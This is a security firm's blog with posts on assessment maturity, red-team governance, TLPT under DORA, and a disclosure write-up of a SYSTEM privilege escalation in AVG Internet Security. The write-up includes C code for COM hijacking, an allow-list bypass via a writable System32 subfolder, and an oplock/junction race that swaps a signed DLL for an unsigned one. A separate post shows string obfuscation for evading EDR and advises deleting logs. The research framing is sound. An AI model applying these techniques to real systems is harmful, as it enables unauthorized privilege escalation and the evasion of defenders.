May 11, 2026

Maturity Levels for Security Assessments: The Right Assessment at the Right Time

At the cirosec TrendTage, I recently gave a talk on pentesting, assumed breach, red teaming, TLPT, and related topics. The graphical classification of the individual types of assessment by maturity level and budget attracted particular interest. Here is a short summary to read up on:

A security assessment is only efficient if it matches the organization's maturity level. Anyone who has not yet done their homework on basic security hygiene wastes valuable resources on a complex red teaming engagement and cannot benefit from the added value of such a project.

Network scans, penetration tests of applications, and initial-access assessments require hardly any prerequisites; the goal is to find vulnerabilities efficiently. An assumed-breach analysis focuses on identifying vulnerabilities in the internal network and in Active Directory. Detection and response capabilities do not yet play a role here, so such assessments can be carried out on a manageable budget, which in turn allows them to be repeated regularly.

As soon as detection and response capabilities are in place, purple teaming / war gaming or assumed-breach red teaming becomes relevant. These exercises no longer test prevention alone; instead, they specifically train the interplay between attack (red team) and defense (blue team).

Classic, compact, and continuous red teaming requires a solid infrastructure and established incident-response processes. The goal is the simulation of real, long-running attacks. Such projects typically target the entire organization and deliver insights on many different levels.

A special form of red-team assessment is the threat-led penetration test (TLPT) according to TIBER. However, this form of assessment is only relevant for particularly mature organizations in the financial sector. Detailed information is available in the separate blog post on this topic.

In summary: you do not have to start with red teaming. Those who align their security assessments with their maturity level build security sustainably and within budget. Organizations with an advanced maturity level, on the other hand, benefit from the insights gained through the holistic attacks of a red-team assessment.

An overview of possible focus areas for penetration tests and red-team assessments is available on our website.

Michael Brügge

Managing Consultant




June 30, 2025

Effective Governance Strategies in Red Teaming: Communication, Risk Analysis, and OPSEC

Abstract

This blog post explores effective governance strategies in red teaming, with particular focus on customer coordination, risk management, OPSEC, and the use of AI technologies.

The rapid evolution of AI technologies such as LLMs enables attackers to carry out phishing attacks automatically and convincingly, a development that makes thorough preparation of blue teams and regular reviews of IT security infrastructures indispensable. Starting from the definition of governance and the comprehensive approach of red teaming, we show how clearly defined test parameters, structured communication strategies, and precise risk assessments make it possible to conduct security assessments that identify vulnerabilities in production systems while minimizing risk. The methodology combines a document-based analysis of relevant standards with empirical data from internal expert interviews to gain insights into how governance is implemented in red teaming.

Introduction

The continuous evolution of attack techniques and of the corresponding detection and response capabilities means that the threat landscape is constantly changing, especially given the boom in AI technologies, which put powerful tools into the hands of attackers and defenders alike. In this dynamic environment, it is crucial to know exactly where vulnerabilities lie at all levels, from infrastructure and processes to human factors.

Traditionally, penetration tests were often used for this purpose, examining individual aspects in isolation and in detail. However, this carries the risk of losing the holistic overview. More and more companies are therefore relying on red-team assessments, which follow a comprehensive, holistic approach. In these assessments, an open scope is deliberately chosen in order to simulate realistic attack scenarios and test the behavior of the defenders under real conditions.

Such an approach is inconceivable without solid governance. Governance provides the structural framework in which all activities, from defining the scope to coordinating with the customer to continuously evaluating the results, take place transparently and in a controlled manner. Governance thus forms the foundation of an effective security strategy that meets current and future challenges.

Definition of Governance in Red Teaming

According to ISO 37000, governance comprises the system of policies, structures, and processes by which an organization is directed and controlled. It ensures that decisions are made in line with ethical, legal, and societal requirements, and it defines responsibilities, accountabilities, and the mechanisms for oversight and accountability. Governance thus forms the framework in which strategic goals are set, risks are managed, and performance is continuously improved, always taking into account the interests of all stakeholders.

Red teaming is a comprehensive, attacker-driven approach that aims to uncover and exploit vulnerabilities in technical systems, organizational processes, and human behavior through realistic attack simulations. In contrast to conventional penetration tests, which focus on identifying as many security flaws as possible within a defined test object, red teaming evaluates an organization's entire security architecture. It tests not only technical deficiencies but also response mechanisms and employees' security awareness under conditions that are as realistic as possible.

Unlike a classic penetration test, red-team assessments are typically carried out covertly. This is an essential difference, and it makes it possible to assess and train the detection and response capabilities of the blue team.

Integrating governance into the red-teaming process ensures that all test activities take place under clearly defined responsibilities, standardized procedures, and regular controls. This guarantees that red-team assessments are conducted transparently, ethically, and in a legally sound manner.

Objectives of This Blog Post

The goal of this post is to identify effective governance strategies in red teaming and to evaluate their practicality. Three key aspects are at the center:

Customer coordination and risk management:
We examine how clear agreements and an accurate risk analysis create a safe framework for red-team assessments.

OPSEC measures:
We discuss how targeted operational security measures, for example the four-eyes principle, can ensure that assessments are carried out inconspicuously.

Use of AI:
We analyze the opportunities and challenges arising from the increased use of AI technologies in red teaming.

The insights gained are intended to serve as a practice-oriented guide and to help companies conduct red-team assessments safely, effectively, and in line with strategic and regulatory requirements.

Methodology

To address this topic, we combined document-based analysis with empirical data collection.

Document-based analysis:
First, relevant standards and official documents are evaluated to capture the theoretical foundations of governance and red teaming.

Empirical data collection:
In addition, data from internal expert interviews feeds into the study. These interviews provide practical insights into how governance strategies are implemented in red teaming.

Customer Coordination and Risk Management

Extensive and precise coordination with the customer is the foundation of a successful red-team assessment. Only clear communication and detailed agreements can minimize risks and ensure a smooth project flow. The following summarizes the essential aspects of this customer coordination.

Customer Agreements

Clear customer agreements serve to avoid misunderstandings and to rule out unwanted interference with the customer's production systems. Before an assessment begins, several central points must be agreed upon to ensure a smooth and safe process:

Responsibilities:
It is clearly defined who acts as the primary point of contact, typically a CISO or another responsible person. This creates clear lines of communication and ensures that questions or problems can be addressed quickly.

Goal definition and scope:
The scope of the assessment is documented in detail by recording all relevant aspects, such as the IP address ranges, locations, systems, and employees to be attacked. Precise scoping prevents areas from being tested unintentionally and enables a targeted analysis of the security infrastructure.

Test parameters (time frame and exclusions):
A clear time frame for the assessment is defined, and explicit exclusions are specified to protect critical systems. The rules of engagement additionally regulate which attack techniques, such as social engineering, are permitted.

Formal documentation:
A detailed briefing questionnaire records all agreed test areas and risks in writing. In addition, a so-called "get-out-of-jail-free card" is issued, in which the client certifies the legitimacy of the attacks carried out; it can be used to resolve a situation in case of doubt.

Figure 1: Customer agreements

These agreements are typically worked out in a detailed kick-off workshop that defines the framework for the entire assessment. In addition, regular jour-fixe meetings are held in which the current status of the assessment, potential risks, and planned attack scenarios are discussed continuously. This structured communication process ensures that all parties, both internal and on the customer side, are always informed about the scope and limits of the assessment. This contributes significantly to conducting the red-team assessment under clearly defined, safe conditions.

Risk Assessment: Attack Impact on Production Systems

The risk assessment of planned attacks plays a decisive role in the course of a red-team assessment. It must be evaluated precisely in advance how potential damage and probabilities of occurrence can be minimized.

One example is the planning of a password-spraying attack. In contrast to a conventional brute-force attack, the attacker does not try to guess one user's login with many passwords, but instead tests all known user accounts with a few passwords that are as generic as possible (Firma2025, Sommer2025, etc.). Measures to protect user accounts against such attacks usually exist: too many failed login attempts lead to the affected account being locked. Since a password-spraying attack targets a broad user base, there is a risk of locking out accounts en masse and thus disrupting day-to-day business.
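As a back-of-the-envelope illustration of how such a risk is kept in check, the minimal sketch below derives a lockout-safe spraying budget from an account lockout policy. The policy values are hypothetical placeholders; in practice they are read from the customer's actual policy and agreed upon in advance.

/* Minimal sketch: deriving a lockout-safe password-spraying budget.
 * All policy values are hypothetical; real engagements take them from
 * the customer's account lockout policy and confirm them beforehand. */
#include <stdio.h>

int main(void) {
    int lockout_threshold   = 5;  /* failed attempts before an account locks (assumed) */
    int observation_minutes = 30; /* window after which the bad-password counter resets (assumed) */
    int safety_margin       = 2;  /* attempts deliberately left unused */

    int per_window = lockout_threshold - safety_margin;
    if (per_window < 1) {
        puts("Policy too strict for spraying; coordinate an alternative with the customer.");
        return 1;
    }
    printf("At most %d password(s) per account per %d-minute window,\n",
           per_window, observation_minutes);
    printf("then pause at least %d minutes before the next round.\n",
           observation_minutes);
    return 0;
}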

To avoid such scenarios, the risks of potential attacks are recorded in writing in the briefing questionnaire before every assessment in order to inform the customer as well as possible about potential risks. In addition, critical attacks should be discussed and evaluated preventively in the regular jour-fixe meetings.

Communication Strategies with the Customer

The kick-off workshop is an essential part of the preparation phase. In this meeting, all relevant aspects of the red-team assessment are discussed in detail, including the scope and test period, the defined rules of engagement, the designation of points of contact, and the delineation of test areas. Clarifying these parameters early ensures that everyone involved, on the customer side as well as within the red team, shares a common understanding of the goals, procedures, and limits.

Since red-team assessments can always take unforeseeable turns, it is crucial to establish a communication structure with the customer before each assessment begins. Setting up ad-hoc messenger groups that bundle all relevant contacts ensures that communication in an emergency is immediate and efficient, so that timely support and clarification are guaranteed.

In addition to the ad-hoc messenger groups, regular jour-fixe meetings form a central part of the communication strategy. These scheduled meetings enable a continuous exchange between the red team and the customer's contacts. Current results, possible deviations from the planned procedure, and potential risks from planned attacks are discussed, making it possible to react early to unforeseen developments and to agree on necessary adjustments to the test procedure. This structured communication rhythm ensures that all parties are always up to date and can be supported quickly and effectively in an emergency.

OPSEC in Red Teaming

Operational security (OPSEC) plays a decisive role in red-team assessments. While technical testing and strategic coordination are essential components of an assessment, OPSEC ensures that attack activities proceed as inconspicuously as possible and do not trigger unintended alarms. It is also meant to prevent any attribution to the red team. This comprises both technical and organizational measures designed to prevent attacks from being discovered through deviating behavior, non-obfuscated tools, or a lack of internal coordination. Consistently applying OPSEC principles is therefore an important part of ensuring the success of every red-team assessment.

Principles of Stealth: Avoiding Identification by the Customer

In red-team assessments, it is essential to carry out the red team's activities in such a way that the customer cannot recognize them as a targeted security assessment. This is achieved through a combination of technical and organizational measures:

Technical measures:
Technical measures in red teaming comprise several approaches that aim to minimize the digital traces of attacks and to prevent their detection by security mechanisms such as EDR and SIEM systems with anomaly detection. A central aspect is largely eliminating log entries that could point to suspicious activity. This includes not only deliberately deleting or obscuring log data but also adapting attack techniques so that they blend seamlessly into normal system operation.

A key point is modifying attacker tools to normalize their behavior patterns. Commonly used tools such as Mimikatz often exhibit characteristic signatures and execution patterns that EDR systems or security analysts can recognize quickly. The use of non-obfuscated versions of such tools should therefore ideally be avoided. If their use is unavoidable, additional obfuscation techniques must be applied, for example by introducing concealment methods that modify the code or make it variable so that its typical signatures can no longer be identified.

In addition, it is recommended to implement dynamic parameters in the tools to make their behavior unpredictable and thus harder to compare with known patterns. All of these measures help ensure that attack activities are interpreted as normal, inconspicuous processes and that the probability of identification by automated systems or manual analysis drops significantly.
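As a toy illustration of the signature-breaking idea described above, the snippet below stores a telltale tool string XOR-encoded so that the plaintext never appears in the compiled binary. Real tooling uses far more elaborate schemes; the string and key here are arbitrary examples.

/* Toy example: decode an XOR-obfuscated string at runtime so that the
 * plaintext ("mimikatz") never appears in the binary's data sections.
 * Key and string are arbitrary; real obfuscation goes much further. */
#include <stdio.h>

int main(void) {
    unsigned char key = 0x5A;
    /* "mimikatz" XORed with 0x5A, precomputed */
    unsigned char enc[] = { 0x37, 0x33, 0x37, 0x33, 0x31, 0x3B, 0x2E, 0x20 };
    char dec[sizeof(enc) + 1];

    for (unsigned i = 0; i < sizeof(enc); i++)
        dec[i] = (char)(enc[i] ^ key);
    dec[sizeof(enc)] = '\0';

    printf("decoded at runtime: %s\n", dec);
    return 0;
}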

Organizational measures:
Compliance with internal OPSEC guidelines is supported significantly by consistently applying the four-eyes principle for critical actions. This means that at least two team members are always involved in sensitive steps to supervise execution and validate decisions together, markedly reducing the risk of information leaks. These measures effectively prevent conclusions from being drawn about the red team's identity and methods, thereby ensuring the discretion and security of the operations.

Case Study: Consistent OPSEC

A practical case study vividly illustrates the importance of consistently implementing governance guidelines in the area of OPSEC during a red-team assessment. In one assessment, a spelling mistake was discovered in the configuration of a software-distribution program used by the red team. This seemingly insignificant error allowed a blue-team analyst to infer red-team activity in the customer's systems.

Although the error was noticed within the red team, the correction was postponed to the following day. This delay gave the blue team enough time to use the mistake as an indicator and thereby expose the attack activities. The customer was thus able to test and train its response capabilities, while the red team subsequently had to identify and exploit new ways to spread further through the internal network.

This example shows how crucial it is to fix even the smallest inconsistencies immediately and to implement strict OPSEC measures. Seamless adherence to governance guidelines, from precise configuration to an immediate reaction to errors, is indispensable for preserving the red team's discretion and safeguarding the integrity of the assessment.

AI in Red Teaming

In red teaming, AI-supported tools are already being used experimentally, for example to fine-tune e-mail content with ChatGPT or Gemini and to support scripting tasks. AI holds particular potential in the area of social engineering by helping to generate authentic communication patterns and by making the creation and adaptation of scripts more efficient.

Risks and Limitations

The use of AI-supported tools entails risks, above all concerning the handling of sensitive data. Strict data-protection requirements (e.g., GDPR) must be observed to prevent unauthorized access. Errors in data processing can lead to inaccurate results, while a lack of transparency in AI decision-making makes traceability difficult. In addition, vulnerabilities in the AI systems themselves can serve as new attack vectors. Overall, the use of AI requires a careful balance between innovation and strict security and compliance measures.

Future Developments

Future developments could include the use of AI to automate website-fuzzing processes, which would enable large-scale information gathering, although these approaches are currently still cost-intensive. The use of deepfakes in social engineering is also considered a possible trend. Overall, AI is expected to play a more significant role in red teaming in the future, with strict governance requirements and data protection remaining central demands.

Conclusion and Outlook

The following offers a look at future developments and challenges in the area of governance strategies in red teaming and illustrates possible approaches to optimization.

Summary of Key Findings

This blog post has shown that structured governance is essential in red teaming in order to conduct holistic security assessments with minimized risk. The key findings include:

Clear customer coordination and scope definition:
Precisely defining the scope of the assessment and coordinating regularly ensures that test activities are unambiguously defined and potential risks are recognized early.

Effective OPSEC measures:
The combination of technical and organizational measures, such as minimizing log traces, using obfuscated tools, and consistently applying the four-eyes principle, keeps attacks inconspicuous and prevents unintended alarms.

Integration of governance principles:
Embedding governance standards into the entire red-teaming process ensures that both internal security requirements and customer requirements are met. This creates a structured framework that supports the safe and effective execution of assessments.

Opportunities and challenges through AI:
The use of AI in red teaming opens up promising possibilities, such as automating attack scenarios, simulating social-engineering attacks more precisely, and optimizing scripting tasks.

Figure 2: Components

At the same time, there are major challenges: strict data-protection and compliance requirements must always be met to protect sensitive data. Errors in AI data processing or a lack of transparency in decision-making can lead to inaccurate results and to new attack vectors. Overall, the use of AI requires a measured balance between new technologies and strict governance measures in order to guarantee a secure and effective security strategy in the long term.

Future Perspectives

The progressive integration of AI into red teaming holds great potential for future developments. Automating website-fuzzing processes with AI support could lead to broad information gains and thereby significantly increase efficiency in identifying vulnerabilities. At the same time, the use of deepfakes in social engineering offers the possibility of simulating even more realistic attack scenarios and further testing the responsiveness of blue teams.

Beyond these advances, it will become increasingly important to continuously adapt governance principles to changing requirements. This means that strict data-protection and compliance requirements and the consistent four-eyes principle must evolve to address the more complex risks of AI-supported red teaming. The close interlocking of innovative AI technologies and proven security strategies will thus be a central success factor in guaranteeing a robust and future-proof security architecture in the long term.

Hannes Allmann

Dual-Study Student




January 29, 2025

The Key to COMpromise – Abusing a TOCTOU race to gain SYSTEM, Part 2

Recap

In the first post of this blog series, we explored the architectural design of various security products and demonstrated how COM hijacking can be leveraged to exploit them: We examined a vulnerability that allowed us to replay a modified message over a named pipe, highlighting a potential attack vector.

As discussed previously, many security products have frontend processes operating in the context of an unprivileged user, which are capable of initiating privileged actions – such as adding exclusions – by interacting with a backend service running at higher privileges. To prevent abuse, most vendors implement mechanisms to ensure these actions originate from trusted processes and take steps to protect those processes from tampering.

However, because frontend processes execute with limited user privileges, COM hijacking presents an opportunity to load a malicious DLL into the process. In our research, we found that this attack vector was viable across all the products we targeted, allowing us to exploit the security product’s inherent trust in its own processes.

To capitalize on this trust relationship, we needed to reverse engineer the communication protocols between the frontend and backend processes. This helped us identify interactions that could be manipulated to escalate privileges.

In this post, we will delve into how we exploited this trust in AVG Internet Security (CVE-2024-6510 ) to gain elevated privileges. But before that, the next section will detail how we overcame an allow-listing mechanism that initially disrupted our COM hijacking attempts.

Figure 1: User Interface of the AVG Internet Security Solution
Alain Rödel and Kolja Grassmann

Consultants


Circumventing an allow list

For this part of our research, we employed the same basic technique as before, but with one key difference: this time, the COM interface was triggered each time we opened a file dialog to block an application. However, we encountered a restriction – we could not load our DLL from just any folder.

When trying to load the DLL from our custom folder at C:\poc, we could not observe any successful DLL load in the Process Monitor. In contrast, the original DLL path worked without issue. Through trial and error, we discovered that placing our DLL in the C:\Windows\system32 directory allowed it to load successfully. This behavior revealed that the product validates the DLL's directory against an allow list, likely as a defense against DLL hijacking attacks.

While loading from C:\Windows\system32 bypassed the allow list, this approach was impractical for our privilege escalation since an unprivileged user cannot write to this directory. However, based on our prior experience bypassing AppLocker configurations, we knew that some subdirectories within C:\Windows\system32 were writable by unprivileged users. One such directory is C:\Windows\System32\spool\drivers\color. By placing the DLL used for the COM hijacking in this writable subdirectory, we successfully bypassed the allow list and achieved code execution in the frontend process.
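To make the two steps concrete, here is a minimal sketch of the pattern described above: copy the payload into the user-writable subdirectory and register it as an in-process COM server under HKCU, where per-user CLSID entries shadow the machine-wide ones for processes running in the user's context. The CLSID is a placeholder, since the class to hijack is product-specific; the paths follow the text.

/* Sketch of the COM hijack with the allow-list bypass. The CLSID is a
 * placeholder (the hijacked class is product-specific); the paths are
 * the ones discussed in the text. */
#include <windows.h>
#include <stdio.h>
#include <string.h>

int main(void) {
    const char *src = "C:\\poc\\payload.dll";
    const char *dst = "C:\\Windows\\System32\\spool\\drivers\\color\\payload.dll";
    const char *key = "Software\\Classes\\CLSID\\"
                      "{00000000-0000-0000-0000-000000000000}\\InprocServer32";
    HKEY hKey;

    /* 1. Place the DLL in a system32 subdirectory writable by unprivileged users. */
    if (!CopyFileA(src, dst, FALSE)) {
        printf("copy failed: %lu\n", GetLastError());
        return 1;
    }

    /* 2. Register the DLL under HKCU so the frontend resolves the class to it. */
    if (RegCreateKeyExA(HKEY_CURRENT_USER, key, 0, NULL, 0, KEY_WRITE,
                        NULL, &hKey, NULL) != ERROR_SUCCESS)
        return 1;
    RegSetValueExA(hKey, NULL, 0, REG_SZ,
                   (const BYTE *)dst, (DWORD)strlen(dst) + 1);
    RegSetValueExA(hKey, "ThreadingModel", 0, REG_SZ,
                   (const BYTE *)"Both", sizeof("Both"));
    RegCloseKey(hKey);

    puts("Hijack registered; opening the product's file dialog triggers the load.");
    return 0;
}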

Figure 2: Schematic ACLs on specific folders in SYSTEM32

With this DLL injection method established, the next step was to analyze the communication with backend processes. In the following section, we will discuss how we leveraged this primitive to manipulate the trust relationship and escalate privileges.

Reverse engineering the RPC communication

Reverse engineering RPC communication can be a daunting task, especially in the beginning. Fortunately, tools like RpcView are invaluable for enumerating and identifying RPC interfaces. However, the process ultimately requires in-depth reverse engineering efforts. For our work with AVG, we used the excellent Akamai Research RPC Toolkit to identify and analyze various RPC interfaces across the different AVG binaries.

Our focus was on RPC server interfaces, as these are the endpoints exposed by high-privileged processes. While the AVGSvc.exe executable does not contain RPC server bindings, we found that the ashServ.dll DLL, which is loaded by the service, does expose such interfaces!

The Akamai RPC Toolkit produced the following output:

"ashServ.dll": {
    // [...]
    "908d4c23-138f-4ac5-af4a-08584ae7c67b": {
        "number_of_functions": 22,
        "functions_pointers": [
            "0x1654e0700",
            "0x1654e0790",
            // [...]
        ],
        "role": "server",
        "flags": "0x6000000",
        "interface_address": "0x165f96020"
    },
    // [...]
    "eb915940-6276-11d2-b8e7-006097c59f07": {
        "number_of_functions": 106,
        "functions_pointers": [
            "0x1655c8180",
            "0x1655c8290",
            // [...]
        ],
        "role": "server",
        "flags": "0x6000000",
        "interface_address": "0x165fca670"
    },
    "1118fbbd-02ee-4910-9d86-9940537ee146": {
        "number_of_functions": 23,
        "functions_pointers": [
            "0x1655c08d0",
            "0x1655c6be0",
            // [...]
        ],
        "role": "server",
        "flags": "0x6000000",
        "interface_address": "0x165fccfb0"
    }
}

From this output, we can observe three major interfaces with 22, 106, and 23 exposed endpoints. The largest interface is the Aavm RPC interface, which has been the subject of previous research and exploitation. Searching for the interface GUID on the web reveals some other interesting blog posts dating back to 2015.

Reverse engineering and renaming the functions within the RPC interface is tedious but relatively straightforward.

Figure 3: Some renamed RPC functions of the Aavm RPC interface

Through this analysis, we discovered an RPC function named AavmRpcRunSystemComponent that uses the CreateProcess API without RPC impersonation:

.rdata:0000000165FCA550 dq offset sub_1655C5580
.rdata:0000000165FCA558 dq offset sub_1655C55D0
.rdata:0000000165FCA560 dq offset AavmRpcRunSystemComponent
.rdata:0000000165FCA568 dq offset DecryptData
.rdata:0000000165FCA570 dq offset AddNetAlert

When the RPC client is not impersonated, any new process spawned through this function will run with SYSTEM privileges, creating a critical opportunity for privilege escalation. However, before this process is initiated, a DSA_FileVerify check takes place:

__int64 __fastcall AavmRpcRunSystemComponent(__int64 a1, unsigned int whitelist_id, __int64 arguments, DWORD *out_pid)
{
  // [...]
  char out_string[32];
  // [...]
  v8 = GetFileById(out_string, whitelist_id); // [1]
  // [...]
  FileW = CreateFileW((LPCWSTR)out_string, 0x80000000, 1u, 0i64, 3u, 0x8000000u, 0i64);
  v12 = FileW;
  v21 = (__int64)FileW;
  if ( FileW == (HANDLE)-1i64 )
  {
    // file not found
  }
  if ( !GetFinalPathNameByHandleW(FileW, szFilePath, 0x104u, 0) )
  {
    // file path could not be resolved
  }
  if ( whitelist_id != 2 && !(unsigned __int8)DSA_FileVerify(szFilePath, 0i64, 18i64) ) // [2]
  {
    LastError = 87; // ERROR_INVALID_PARAMETER
    CloseHandle(v12);
    return LastError;
  }
  // [...]
  snprintf(combined_arguments, v15, L"%s %s", szFilePath, arguments); // [3]
  // [...]
  if ( CreateProcessW(szFilePath, combined_arguments, 0i64, 0i64, 0, 0, 0i64, 0i64, &StartupInfo, &ProcessInformation) ) // [4]
  {
    // Win ?

Several validations take place before the process is created:

  1. Based on the integer argument in [1], GetFileById returns a filename. Most of the executable files in this list are repair or setup tools, such as aswOfferTool.exe, SupportTool.exe and AvEmUpdate.exe, which limits the options to those predefined binaries.
  2. A file signature verification is performed by DSA_FileVerify in [2] to ensure only trusted binaries can be executed. This check prevents an attacker from inserting their own malicious binary into the process.
  3. Finally, the program arguments are constructed in [3], and the process is created with SYSTEM privileges in [4].
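Incidentally, what makes this function interesting in the first place is the missing client impersonation noted above. For contrast, here is a minimal sketch of the server-side pattern that would mitigate it; the handler name and surrounding logic are hypothetical, while the RPC runtime calls are real:

/* Mitigation sketch: impersonate the RPC client so that any action taken
 * on its behalf runs with the caller's token, not the service's SYSTEM
 * token. Handler name and surrounding logic are hypothetical. */
#include <windows.h>
#include <rpc.h>

long HandleRunComponent(RPC_BINDING_HANDLE client /* , ... */) {
    RPC_STATUS st = RpcImpersonateClient(client);
    if (st != RPC_S_OK)
        return st;              /* refuse rather than act as SYSTEM */

    /* ... validate input and create the process under the caller's identity ... */

    RpcRevertToSelfEx(client);  /* always drop the impersonation again */
    return 0;
}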

Although this function appears to be a promising privilege escalation vector, the constraints of the allow-listed binaries and file signature verification present significant roadblocks. Without the ability to exploit any of the allow-listed programs, this avenue may seem like a dead end.

To overcome this limitation, we decided to experiment with the RPC client bindings found in the aavmrpch.dll library. Using this approach, we began testing the functionality of various RPC interfaces, with particular emphasis on the AavmRpcRunSystemComponent function, to explore potential exploitation paths.

Abusing the update mechanism

The most promising target for exploitation was the AvEmUpdate.exe executable, which accepts a range of command-line arguments. This executable is responsible for installing updates provided as cab or DLL files. Since we could control the arguments passed to it, this presented a compelling opportunity for further exploration.

One particularly interesting argument was /applydll, which allows the process to load a specified DLL. Crucially, because the process runs with SYSTEM privileges, this argument could potentially be abused to escalate privileges. However, the update mechanism includes an additional safeguard: it verifies that the provided DLL is signed by the manufacturer. This signature check prevented us from directly supplying a custom DLL to gain SYSTEM privileges.

TOCTOU race

Despite this limitation, we were confident that we could bypass the integrity check by carefully analyzing and exploiting the logic of the process. We finally found a time-of-check to time-of-use (TOCTOU) issue in the logic, which made the integrity checks bypassable. To exploit this reliably, we employed a combination of OpLocks (opportunistic locks) and junctions.

To control the timing of the file accesses and win the race reliably, we needed a way to put the update process into a waiting state. We used an OpLock to block access to the DLL file and force the update process to wait until we released the OpLock. This works even against processes running as SYSTEM while we operate as an unprivileged user, and it gave us time to prepare the next step.

We also needed to be able to switch out the DLL file while holding our OpLock. This is where junctions come in. Junctions are a form of symbolic link that redirects file system access to a different location. Since an unprivileged user can create junctions, we used this capability to redirect file accesses during exploitation while holding our OpLock: by pointing the junction at a different location before each access, we could precisely control which file every single access resolved to. For more information on OpLocks and junctions, refer to the code provided by James Forshaw and this article from ZDI.

Here’s how the exploit worked:

  1. The AvEmUpdate.exe process made multiple file accesses before loading the DLL, likely to verify its legitimacy.
  2. Using a junction, we redirected the process to a valid, signed DLL for the first three file access attempts.
  3. On the fourth file access, when the process attempted to load the DLL, we redirected the junction to our malicious DLL containing the privilege escalation payload.

Because we were holding an OpLock on the initial three file accesses, we could dynamically change the target of the junction while the SYSTEM process was waiting for access to the previous file. After updating the junction’s target, we released the OpLock, allowing the process to move on to the next file. We repeated this until the fourth access successfully loaded our malicious DLL.
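Below is a minimal sketch of this primitive, loosely modeled on Forshaw-style tooling: hold a batch oplock on the file currently behind the junction, and re-point the junction while the SYSTEM process is blocked on its open. The paths, the number of accesses, and the use of mklink to (re)create the junction are illustrative assumptions, and the re-arming between accesses is simplified.

/* Sketch: oplock + junction swap. The update process opens
 * C:\poc\redir\update.dll several times; the junction decides which real
 * file each open resolves to. Illustrative only: paths, access count,
 * and timing handling are simplified assumptions. */
#include <windows.h>
#include <winioctl.h>
#include <stdio.h>
#include <stdlib.h>

static void set_junction(const char *target) {
    /* mklink /J creates NTFS junctions without admin rights */
    char cmd[512];
    snprintf(cmd, sizeof(cmd),
             "cmd /c rmdir C:\\poc\\redir & mklink /J C:\\poc\\redir \"%s\"", target);
    system(cmd);
}

int main(void) {
    set_junction("C:\\poc\\signed"); /* early accesses must see the signed DLL */

    for (int access = 1; access <= 3; access++) {
        /* Arm a batch oplock directly on the signed DLL. */
        HANDLE h = CreateFileA("C:\\poc\\signed\\update.dll", GENERIC_READ,
                               FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
                               NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL);
        if (h == INVALID_HANDLE_VALUE) return 1;

        OVERLAPPED ov = {0};
        ov.hEvent = CreateEventA(NULL, TRUE, FALSE, NULL);
        DWORD bytes;
        /* Stays pending until another process opens the file. */
        DeviceIoControl(h, FSCTL_REQUEST_BATCH_OPLOCK, NULL, 0, NULL, 0, &bytes, &ov);
        WaitForSingleObject(ov.hEvent, INFINITE); /* update process is now blocked */

        /* While it waits, decide what its NEXT open resolves to: before the
         * fourth access (the actual load), swap in the unsigned payload. */
        set_junction(access == 3 ? "C:\\poc\\payload" : "C:\\poc\\signed");

        CloseHandle(ov.hEvent);
        CloseHandle(h); /* releases the oplock; the blocked open completes */
    }
    return 0;
}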

Figure 4: Visualization of the junction redirects

Note that the process always accesses the same file; however, using the junction, we change the files accessible under this path.

While this technique successfully allowed us to bypass the signature verification and load our malicious DLL, it wasn’t sufficient on its own to fully escalate privileges. In the next section, we will delve into the additional steps required to achieve high privileges on the system and the challenges we encountered along the way.

Disabling self-defense

Even after successfully executing the TOCTOU (time-of-check-to-time-of-use) race, our malicious DLL was not loaded into the process. Upon further investigation, we discovered that the process only loaded DLLs with valid signatures. This added layer of protection significantly complicated our exploitation attempts. We suspect this behavior was due to the process being launched as a PPL (Protected Process Light) process.

After some trial and error, we found that this restriction was enforced only when the product’s self-protection feature was enabled. Fortunately, we identified an RPC function, AavmRpcDisableSelfDefense, that could disable this self-protection mechanism. This function was exported by the same DLL (ashServ.dll) we had already interacted with in our previous RPC calls. By calling this function, we successfully disabled the product’s self-defense feature.

With self-defense disabled, our malicious DLL was successfully loaded into the process running with SYSTEM privileges, finally completing the privilege escalation.

To summarize, the exploitation in this case worked as follows:

1. Initial entry with COM hijacking:

  • We used COM hijacking to load a DLL into the frontend process.
  • To bypass the allow-listing mechanism, the DLL was placed in C:\Windows\System32\spool\drivers\color.

2. Disabling self-defense:

  • The loaded DLL then called the function AavmRpcDisableSelfDefense to deactivate the product's self-protection feature.

3. Triggering the update mechanism:

  • The DLL triggered an update by calling AavmRpcRunSystemComponent.
  • Using a junction in combination with OpLocks, we tricked the update process into loading an unsigned DLL.
  • This allowed us to escalate our privileges to SYSTEM.

Summary

In this blog post, we demonstrated how COM hijacking can be leveraged to exploit AVG Internet Security and gain SYSTEM privileges. Unlike the previous case, we encountered an additional obstacle, namely an allow-listing mechanism that initially blocked our DLL. We described how we bypassed this restriction by placing the DLL in a writable system directory. We detailed our reverse engineering of the product's RPC calls, which uncovered functions that allowed us to disable self-protection and trigger the update mechanism. By combining a junction with OpLocks, we bypassed the signature check and successfully loaded an unsigned DLL, enabling us to escalate privileges to SYSTEM.

In the next post, we will explore two additional vulnerabilities related to COM hijacking and describe how we exploited them to achieve privilege escalation.

This article was written as part of joint research with Neodyme.



January 24, 2025

TLPT: Threat-Led Penetration Tests under DORA


Summary

Since January 17, 2025, the Digital Operational Resilience Act (DORA) has applied. One important aspect of DORA is the requirement to regularly perform threat-led penetration tests (TLPT). Only selected entities within the financial sector are required to conduct TLPTs. Even though TLPTs sound like a new concept, they have actually existed in Germany since 2020 in the form of TIBER tests. This blog post describes the concepts behind TLPTs and how they are conducted. Furthermore, alternatives for targeted and budget-oriented red-team assessments are presented.

Who is affected by DORA and TLPT?

On January 17, 2025, the European Union's Digital Operational Resilience Act (DORA) took effect. The regulation aims to ensure and strengthen digital operational resilience in the financial sector, so that the European financial market is protected as well as possible against attacks and risks in IT and information security. According to BaFin, virtually all supervised institutions and companies in the financial sector are affected by the regulation (source: BaFin).

A key instrument of DORA is the performance of threat-led penetration tests, abbreviated TLPT. While DORA affects almost all companies in the financial sector, by no means all of them must also conduct TLPTs. Whether a company is obligated to perform these extended, threat-led penetration tests is decided by the competent supervisory authority based on the criteria laid down in Article 26 of DORA (see the EU regulation), which then informs the affected companies.

"BaFin will carry out this identification process for the first time at the end of 2024/beginning of 2025 and will then repeat it regularly. Separately, BaFin, in coordination with the Bundesbank, will inform the respective institutions and companies about their specific individual test start (test order)," according to BaFin.

In addition to potentially critical impacts on the company's systemically relevant services and on the European financial market, the company's maturity level in IT and information security is particularly relevant to this selection.

What exactly is behind TLPT?

My colleagues and I regularly talk with our customers from the financial sector about TLPT. The core question these companies ask is always what TLPT actually means.

